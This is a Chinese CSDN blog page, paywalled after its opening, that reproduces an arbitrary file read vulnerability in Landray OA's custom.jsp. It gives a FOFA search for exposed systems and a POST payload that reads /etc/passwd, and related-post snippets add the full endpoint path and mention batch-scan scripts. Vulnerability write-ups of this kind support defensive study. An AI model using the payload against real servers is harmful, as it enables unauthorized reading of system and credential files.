蓝凌OA custom.jsp 任意文件读取漏洞(含批量验证poc)

已于 2024-04-06 21:45:38 修改
阅读量49 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-06 21:45:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137439256
版权

一、 漏洞分析

1.1 应用简介

蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞。

1.2 漏洞描述

蓝凌OA custom.jsp 存在任意文件读取漏洞。

1.3 环境准备

Fofa查询语句
app=”Landray-OA系统”

可打开进入登录页面

1.4 漏洞复现
构造payload发送
var={“body”:{“file”:”file:///etc/passwd”}}

漏洞payload为
POST /sys/ui/

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
【1day】蓝凌OA 系统custom.jsp 接口任意文件读取漏洞学习
记录并分享学习安全的知识点..
12-05 597
蓝凌OA系统是一套企业级办公自动化软件解决方案。蓝凌OA系统提供了一系列功能模块,帮助企业实现高效的办公管理和协同工作。蓝凌OA 系统custom.jsp 接口存在任意文件读取漏洞,,攻击者通过漏洞读取服务器中任意文件。 ​
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
启动蓝凌OA项目的全步骤.md
07-11
公司用的oa项目的启动和初始化步骤。
蓝凌oa任意文件读取,RCE
Dalian0的博客
11-03 4438
蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce 漏洞路径: 1.任意文件读取: /sys/ui/extend/varkind/custom.jsp 漏洞验证: burp抓包修改数据包 修改为post请求,路径如图 数据包 POST /sys/ui.
蓝凌(Landray)OA漏洞常见RCE
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
Python 蓝凌OA任意文件读取批量扫描 poc编写
YouthBelief的博客
02-15 1207
0x00 前言 CNVD-2021-28277 蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,Landray-OA系统被爆出存任意文件读取漏洞。 0x01 fofa 查询语句 app=“Landray-OA系统” 0x02 漏洞位置 POST请求 /sys/ui/extend/varkind/custom.jsp data:var={“body
蓝凌OA系统V15.0管理员手册.zip
07-08
适合新接触OA的系统管理员及运维人员使用
蓝凌OA产品V14系统安装维护手册.chm
07-04
蓝凌OA产品V14系统安装维护手册.chm
蓝凌OA系统排名?蓝凌OA办公系统怎么选?什么是用户口碑最好的蓝凌OA系统?
04-13
提到OA选型,难免不会提到蓝凌蓝凌OA怎么样?蓝凌OA有哪些优缺点?蓝凌OA用户口碑怎么样? 想了解这些信息,您应该到选型宝,B2B的大众点评,看看用户对蓝凌OA产品的实名点评。 关于蓝凌OA,以下信息来自选型宝...
漏洞复现】蓝凌OA近期公开几个漏洞汇总
Adminxe的博客
07-02 5045
0x00 蓝凌OA custom.jsp 任意文件读取漏洞 1、app=”Landray-OA系统” 2、漏洞复现 出现漏洞文件custom.jsp <%@page import="com.landray.kmss.util.ResourceUtil"%> <%@page import="net.sf.json.JSONArray"%> <%@page import="net.sf.json.JSONObject"%> <%@ page lang..
蓝凌OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
蓝凌OA custom命令执行漏洞批量验证poc
weixin_43567873的博客
04-18 125
蓝凌OA custom命令执行漏洞批量验证poc
蓝凌OA存在任意文件读取漏洞
nnn2188185的博客
06-15 494
蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
黑龙江等保测评:强化网络安全的北方防线
2301_79527080的博客
05-28 418
二、黑龙江等保测评的实践探索1. 法规政策引领:黑龙江省积极响应国家网络安全法律法规要求,出台了一系列地方性政策文件,明确了等保测评的实施标准和要求,为全省范围内的等保工作提供了法律依据和指导。2. 强化合规意识:等保测评的实施增强了组织和个人的网络安全合规意识,推动了网络安全法律法规的落实,形成了良好的网络安全文化氛围。3. 促进产业发展:等保测评需求带动了网络安全服务市场的繁荣,促进了本土网络安全企业的成长,同时也吸引了国内外先进技术和服务的引进,为黑龙江乃至东北地区的数字经济转型提供了安全保障。
2024年中国金融行业网络安全案例集
2301_76786857的博客
05-27 302
随着科技的飞速发展,金融行业与信息技术的融合日益加深,网络安全已成为金融行业发展的生命线。金融行业作为国家经济的核心支柱,正在面临着日益复杂严峻的网络安全挑战。因此,深入研究和探讨金融行业的网络安全问题,不仅关乎金融行业的稳健运行,更关系到国家经济的安全和社会的稳定。
“区块链技术在网络安全领域的革新应用与挑战“
2403_84237550的博客
05-29 506
区块链技术,以其去中心化、不可篡改和透明度高的特性,在网络安全领域展现出了巨大的革新潜力,同时也带来了一系列新的挑战。以下是区块链技术在网络安全领域的应用及其面临的主要挑战的深入分析。2. 身份认证与管理:利用区块链建立去中心化的身份认证系统,用户可以控制自己的数字身份,减少身份盗窃和欺诈的风险,提高身份验证安全性和效率。2. 隐私保护:虽然区块链增强了数据的完整性,但公开的区块链设计可能暴露用户的部分交易信息,需要更先进的加密技术和匿名机制来加强隐私保护。
2022年全国职业院校技能大赛高职组“信息安全管理与评估”赛项第三阶段任务书
最新发布
Geek极安云科-致力于网络安全事业
05-29 340
请获取FTP服务器上对应的应用程序,连接Pwn1服务器的10000端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。请获取FTP服务器上对应的应用程序,连接Pwn2服务器的10001端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。flag格式 flag{}(30分)请获取FTP服务器上对应的文件进行分析,找出其中隐藏的flag,并将flag提交。图1 网络拓扑结构图。通过找到正确的flag值来获取得分,它的格式如下所示:flag{}
Web安全文件上传漏洞详解,文件上传漏洞原理、绕过方式和防御方案。
wangyuxiang946的博客
05-28 1918
结合实战靶场解析文件上传漏洞过滤及绕过方式,讲解文件上传原理和防御方式,
蓝凌oa 自定义表单jsp片段
09-07
蓝凌OA是一款企业办公自动化软件,用户可以根据自身需求进行定制化配置。其中,自定义表单是蓝凌OA的一个重要功能,可以通过配置表单以满足不同的业务需求。 自定义表单中的JSP片段是用于自定义表单界面呈现的一部分。在蓝凌OA中,我们可以通过编辑JSP片段来定制表单界面的展示效果。 首先,我们需要登录蓝凌OA的管理员账号并进入自定义表单的管理界面。在界面上找到需要编辑的表单,点击进入编辑模式。在编辑模式下,我们可以看到JSP片段的编辑选项。 接下来,我们可以根据需求对JSP片段进行编辑。通过编辑JSP代码,我们可以实现表单中各个字段的布局、样式以及交互效果的定制。例如,可以设置表单布局的排列方式、控制字段的显示和隐藏、添加自定义的验证规则等。 编辑完成后,我们需要保存修改并发布表单。此时,系统会对JSP片段进行编译,并将其应用到表单界面中。 通过自定义表单JSP片段,我们可以实现更加灵活的表单定制。无论是在布局、样式还是交互方面,都可以按照自己的需求进行个性化配置。这样可以提升用户的使用体验,同时也能更好地满足业务需求。 总之,蓝凌OA的自定义表单JSP片段功能为用户提供了灵活和定制化的表单界面配置方式,让用户能够更好地满足自身的办公需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值